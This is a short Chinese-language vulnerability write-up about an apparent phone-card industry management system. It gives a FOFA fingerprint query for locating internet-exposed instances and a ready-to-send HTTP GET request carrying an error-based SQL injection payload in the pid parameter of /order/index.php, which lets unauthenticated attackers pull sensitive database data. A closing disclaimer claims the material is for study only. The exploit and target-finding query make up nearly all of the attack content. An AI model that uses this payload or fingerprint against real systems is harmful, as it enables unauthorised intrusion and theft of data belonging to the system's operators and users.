0x01 产品简介
号卡极团管理系统是一款专为号卡行业打造的管理系统,它具备一系列强大的功能,能够满足号卡行业推广人员在业务运营中的各类需求。
0x02 漏洞概述
号卡极团管理系统存在SQL注入漏洞,未授权的攻击者可以通过该漏洞获取数据库敏感信息。
0x03 测绘语句
fofa: icon_hash="-795291075" && is_domain=false
0x04 漏洞复现
GET /order/index.php?pid=1%27%20AND%20(extractvalue(1,concat(0x7e,(select%20md5(1)),0x7e)));--%20htjf HTTP/1.1
0x05 影响范围
号卡极团管理系统
0x06 免责声明
本文所涉及的任何技术、信息或工具,仅供学习和参考之用。
请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。
作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。